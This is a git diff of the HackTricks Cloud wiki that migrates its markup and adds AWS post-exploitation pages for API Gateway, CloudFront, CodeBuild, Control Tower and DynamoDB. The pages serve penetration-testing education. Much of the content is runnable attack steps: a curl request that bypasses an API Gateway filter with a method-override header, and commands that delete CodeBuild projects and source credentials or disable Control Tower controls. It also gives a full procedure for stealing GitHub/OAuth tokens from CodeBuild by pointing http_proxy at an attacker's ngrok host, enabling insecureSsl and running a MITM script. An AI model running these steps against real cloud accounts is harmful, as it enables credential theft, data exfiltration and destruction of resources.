@@ -142,17 +128,4 @@ Write-Host "Role juggling check complete."
-{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-post-exploitation/README.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/README.md diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md similarity index 66% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md index 405ff5e93..6eff1bc94 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - API Gateway Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## API Gateway For more information check: -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} ### Access unexposed APIs @@ -36,22 +23,18 @@ As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloud Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: -{% code overflow="wrap" %} ```yaml - RequestTemplates: - application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +RequestTemplates: + application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' ``` -{% endcode %} However, sending a request with **`Content-type: text/json`** would prevent that filter. Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: -{% code overflow="wrap" %} ```bash curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' ``` -{% endcode %} ### Usage Plans DoS @@ -63,7 +46,6 @@ The **API Key** just need to be **included** inside a **HTTP header** called **` An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" RESPONSE_TYPE="DEFAULT_4XX" @@ -74,19 +56,16 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:UpdateStage`, `apigateway:CreateDeployment` An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" STAGE_NAME="Prod" @@ -97,13 +76,11 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` @@ -124,9 +101,8 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod **Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` @@ -144,9 +120,8 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod **Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` @@ -165,21 +140,7 @@ aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_K **Potential Impact**: Unauthorized access to API resources, bypassing security controls. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md new file mode 100644 index 000000000..ebcb510d5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md @@ -0,0 +1,31 @@ +# AWS - CloudFront Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## CloudFront + +For more information check: + +{{#ref}} +../aws-services/aws-cloudfront-enum.md +{{#endref}} + +### Man-in-the-Middle + +This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). + +#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket + +- **Create** the malicious **function**. +- **Associate** it with the CloudFront distribution. +- Set the **event type to "Viewer Response"**. + +Accessing the response you could steal the users cookie and inject a malicious JS. + +#### scenario 2: MitM where CloudFront is already using a lambda function + +- **Modify the code** of the lambda function to steal sensitive information + +You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md new file mode 100644 index 000000000..913b55a5b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md @@ -0,0 +1,84 @@ +# AWS - CodeBuild Post Exploitation + +{{#include ../../../../banners/hacktricks-training.md}} + +## CodeBuild + +For more information, check: + +{{#ref}} +../../aws-services/aws-codebuild-enum.md +{{#endref}} + +### Check Secrets + +If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ +Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. + +{{#ref}} +../../aws-privilege-escalation/aws-secrets-manager-privesc.md +{{#endref}} + +### Abuse CodeBuild Repo Access + +In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: + +
+ +The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. + +An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ +In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): + +
+ +And **change the Buildspec commands to exfiltrate each repo**. + +> [!WARNING] +> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ +> Or does he? Check the next section + +### Leaking Access Tokens from AWS CodeBuild + +You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: + +```bash +aws codebuild list-source-credentials +``` + +{{#ref}} +aws-codebuild-token-leakage.md +{{#endref}} + +### `codebuild:DeleteProject` + +An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. + +```bash +aws codebuild delete-project --name +``` + +**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. + +### `codebuild:TagResource` , `codebuild:UntagResource` + +An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws codebuild tag-resource --resource-arn --tags +aws codebuild untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +### `codebuild:DeleteSourceCredentials` + +An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. + +```sql +aws codebuild delete-source-credentials --arn +``` + +**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md new file mode 100644 index 000000000..e433f04eb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md @@ -0,0 +1,188 @@ +# AWS Codebuild - Token Leakage + +{{#include ../../../../banners/hacktricks-training.md}} + +## Recover Github/Bitbucket Configured Tokens + +First, check if there are any source credentials configured that you could leak: + +```bash +aws codebuild list-source-credentials +``` + +### Via Docker Image + +If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. + +For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. + +The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. + +1. **Create & Upload your own Docker MitM image** + - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. + - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. + - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host + - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) +2. **Set the environment** + - Create a **new Codebuild project** or **modify** the environment of an existing one. + - Set the project to use the **previously generated Docker image** + +
+ +3. **Set the MitM proxy in your host** + +- As indicated in the **Github repo** you could use something like: + +```bash +mitmproxy --listen-port 4444 --allow-hosts "github.com" +``` + +> [!TIP] +> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. + +4. **Run the build & capture the credentials** + +- You can see the token in the **Authorization** header: + +
+ +This could also be done from the aws cli with something like + +```bash +# Create project using a Github connection +aws codebuild create-project --cli-input-json file:///tmp/buildspec.json + +## With /tmp/buildspec.json +{ + "name": "my-demo-project", + "source": { + "type": "GITHUB", + "location": "https://github.com/uname/repo", + "buildspec": "buildspec.yml" + }, + "artifacts": { + "type": "NO_ARTIFACTS" + }, + "environment": { + "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM + "image": "docker.io/carlospolop/docker-mitm:v12", + "computeType": "BUILD_GENERAL1_SMALL", + "imagePullCredentialsType": "CODEBUILD" + } +} + +## Json + +# Start the build +aws codebuild start-build --project-name my-project2 +``` + +### Via insecureSSL + +**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ +Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. + +- First you need to enumerate the current configuration with something like: + +```bash +aws codebuild batch-get-projects --name +``` + +- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). + - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like: + +```bash +aws codebuild update-project --name \ + --source '{ + "type": "GITHUB", + "location": "https://github.com/carlospolop/404checker", + "gitCloneDepth": 1, + "gitSubmodulesConfig": { + "fetchSubmodules": false + }, + "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", + "auth": { + "type": "CODECONNECTIONS", + "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" + }, + "reportBuildStatus": false, + "insecureSsl": true + }' \ + --environment '{ + "type": "LINUX_CONTAINER", + "image": "aws/codebuild/standard:5.0", + "computeType": "BUILD_GENERAL1_SMALL", + "environmentVariables": [ + { + "name": "http_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + }, + { + "name": "https_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + } + ] + }' +``` + +- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="127.0.0.1", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+ +### ~~Via HTTP protocol~~ + +> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** + +An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. + +- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). + +
+ +
+ +- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` +- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="0.0.0.0", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +- Next, click on **Build the project** or start the build from command line: + +```sh +aws codebuild start-build --project-name +``` + +- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+ +> [!WARNING] +> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md new file mode 100644 index 000000000..a37af9d5b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md @@ -0,0 +1,20 @@ +# AWS - Control Tower Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Control Tower + +{{#ref}} +../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +{{#endref}} + +### Enable / Disable Controls + +To further exploit an account, you might need to disable/enable Control Tower controls: + +```bash +aws controltower disable-control --control-identifier --target-identifier +aws controltower enable-control --control-identifier --target-identifier +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md similarity index 56% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md index 0160899e9..af0db2d40 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md @@ -1,19 +1,6 @@ # AWS - DLM Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Data Lifecycle Manger (DLM) @@ -105,17 +92,4 @@ A template for the policy document can be seen here: } ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md similarity index 74% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md index a431beae5..b09f35642 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -1,35 +1,22 @@ # AWS - DynamoDB Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DynamoDB For more information check: -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} ### `dynamodb:BatchGetItem` An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). -{% tabs %} -{% tab title="json file" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="json file" }} + ```bash aws dynamodb batch-get-item --request-items file:///tmp/a.json @@ -46,19 +33,19 @@ aws dynamodb batch-get-item --request-items file:///tmp/a.json } } ``` -{% endcode %} -{% endtab %} -{% tab title="inline" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="inline" }} + ```bash aws dynamodb batch-get-item \ --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ --region ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Indirect privesc by locating sensitive information in the table @@ -66,18 +53,16 @@ aws dynamodb batch-get-item \ **Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: -{% code overflow="wrap" %} ```json aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json // With a.json -{ -"Id" : { +{ +"Id" : { "N": "205" } } ``` -{% endcode %} With this permission it's also possible to use the **`transact-get-items`** method like: @@ -104,24 +89,25 @@ aws dynamodb transact-get-items \ **Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. -{% tabs %} -{% tab title="json file" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="json file" }} + ```bash aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json - + // With a.json - { -"Id" : { + { +"Id" : { "ComparisonOperator":"EQ", "AttributeValueList": [ {"N": "205"} ] } } ``` -{% endcode %} -{% endtab %} -{% tab title="inline" %} +{{#endtab }} + +{{#tab name="inline" }} + ```bash aws dynamodb query \ --table-name TargetTable \ @@ -129,8 +115,9 @@ aws dynamodb query \ --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Indirect privesc by locating sensitive information in the table @@ -211,9 +198,9 @@ aws dynamodb restore-table-from-backup \ This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. -{% tabs %} -{% tab title="XSS Example" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="XSS Example" }} + ```bash ## Create new item with XSS payload aws dynamodb put-item --table --item file://add.json @@ -230,18 +217,20 @@ aws dynamodb put-item --table --item file://add.json } } ``` -{% endcode %} -{% endtab %} -{% tab title="AI Example" %} +{{#endtab }} + +{{#tab name="AI Example" }} + ```bash aws dynamodb put-item \ --table-name ExampleTable \ --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table @@ -249,9 +238,9 @@ aws dynamodb put-item \ This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. -{% tabs %} -{% tab title="XSS Example" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="XSS Example" }} + ```bash ## Update item with XSS payload aws dynamodb update-item --table \ @@ -270,10 +259,11 @@ aws dynamodb update-item --table \ } } ``` -{% endcode %} -{% endtab %} -{% tab title="AI Example" %} +{{#endtab }} + +{{#tab name="AI Example" }} + ```bash aws dynamodb update-item \ --table-name ExampleTable \ @@ -282,8 +272,9 @@ aws dynamodb update-item \ --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table @@ -313,9 +304,8 @@ aws dynamodb delete-backup \ ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` -{% hint style="info" %} -TODO: Test if this actually works -{% endhint %} +> [!NOTE] +> TODO: Test if this actually works An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. @@ -356,17 +346,4 @@ bashCopy codeaws dynamodbstreams get-records \ **Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md similarity index 76% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 4000b19ca..ae2038219 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -1,27 +1,14 @@ # AWS - EC2, EBS, SSM & VPC Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
